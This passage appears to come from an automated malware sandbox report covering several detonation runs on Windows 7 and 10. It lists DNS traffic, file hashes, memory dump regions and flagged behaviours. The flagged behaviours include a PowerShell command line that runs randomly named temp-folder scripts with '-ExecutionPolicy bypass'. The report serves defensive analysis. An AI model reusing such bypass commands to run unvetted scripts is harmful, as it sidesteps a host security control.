| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dd1g0dnc.veq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3828-1-0x0000025AF9A90000-0x0000025AF9AB2000-memory.dmp
memory/3828-10-0x00007FF84AAF0000-0x00007FF84B5B1000-memory.dmp
memory/3828-11-0x0000025AF9A50000-0x0000025AF9A60000-memory.dmp
memory/3828-12-0x0000025AF9A50000-0x0000025AF9A60000-memory.dmp
memory/3828-15-0x00007FF84AAF0000-0x00007FF84B5B1000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win7-20240221-en
Max time kernel
1795s
Max time network
1819s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1
Network
Files
memory/2664-4-0x000000001B490000-0x000000001B772000-memory.dmp
memory/2664-5-0x00000000022E0000-0x00000000022E8000-memory.dmp
memory/2664-6-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp
memory/2664-7-0x00000000022F0000-0x0000000002370000-memory.dmp
memory/2664-8-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp
memory/2664-9-0x00000000022F0000-0x0000000002370000-memory.dmp
memory/2664-11-0x00000000022F4000-0x00000000022F7000-memory.dmp
memory/2664-10-0x00000000022F0000-0x0000000002370000-memory.dmp
memory/2664-12-0x00000000022F0000-0x0000000002370000-memory.dmp
memory/2664-13-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win7-20240215-en
Max time kernel
1562s
Max time network
1569s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1
Network
Files
memory/2320-4-0x000000001B520000-0x000000001B802000-memory.dmp
memory/2320-6-0x00000000026E0000-0x00000000026E8000-memory.dmp
memory/2320-5-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2320-7-0x0000000002A80000-0x0000000002B00000-memory.dmp
memory/2320-8-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2320-9-0x0000000002A80000-0x0000000002B00000-memory.dmp
memory/2320-10-0x0000000002A80000-0x0000000002B00000-memory.dmp
memory/2320-11-0x0000000002A80000-0x0000000002B00000-memory.dmp
memory/2320-12-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win10v2004-20240226-en
Max time kernel
1755s
Max time network
1802s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4032 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| IE | 74.125.193.95:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 95.193.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z5zccit5.mku.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4364-9-0x000001FC384A0000-0x000001FC384C2000-memory.dmp
memory/4364-12-0x00007FF9E9440000-0x00007FF9E9F01000-memory.dmp
memory/4364-13-0x00007FF9E9440000-0x00007FF9E9F01000-memory.dmp